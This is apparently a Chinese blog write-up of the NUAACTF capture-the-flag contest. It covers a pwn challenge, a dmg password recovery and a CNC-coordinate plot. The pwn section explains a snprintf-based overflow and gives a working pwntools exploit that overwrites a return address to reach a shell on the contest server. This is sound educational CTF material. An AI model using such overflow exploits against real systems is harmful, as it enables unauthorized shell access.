qinmaye

NUAACTF-WP
NUAACTF-writeup算是第一次参加正规的ctf比赛吧,抱着带妹的心态随便玩了一下,结果还可以。pwnpa...
扫描右侧二维码阅读全文
27
2018/12

NUAACTF-WP

NUAACTF-writeup

算是第一次参加正规的ctf比赛吧,抱着带妹的心态随便玩了一下,结果还可以。

pwn

password_checker

ida打开看到有两次输入name和pwd,第二次用snprintf返回值作为数组下标开始输入,snprintf返回的是输入字符串的总长的,造成溢出,先输入256个字符再输入5个字符加上getshell的地址‘0x08048674’

from pwn import *
io = remote('ctf.asuri.org',20002)
payload1='aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
payload2='A'*5 + p32(0x08048674)
io.sendline(payload1)
io.sendline(payload2)
io.interactive()

misc

签到题

题目直接给出flag

fs

先hexdump一下

112

搜了一下文件头前面十六位没有任何发现……然后google了一下encrcdsa,从而大概猜到是dmg文件

112

啥是dmg文件?mac里面的压缩文件,陆师傅这是欺负我们没有mac啊??还好矿王装了一个macos虚拟机,嘿嘿嘿,陆师傅难不倒我们,等等,解压密码?

112

不过难不倒我们,在hexdump最后找到了密码Xmas3?theme3

嘿嘿嘿,flagcorrect!

112

plot

对于一个上过工程训练的工科生,一眼就知道这是CNC代码,找个车床的仿真软件运行一下就行,奈何没有找到一个合适的(用不来了),于是想到,想要画出flag,一定是铣床,那既然有坐标了,拿什么画都行啊,然后就是把坐标提取出来,用excel散点图画。

矿王牛逼

最后修改:2019 年 01 月 04 日 05 : 30 PM
如果觉得我的文章对你有用,请随意赞赏

发表评论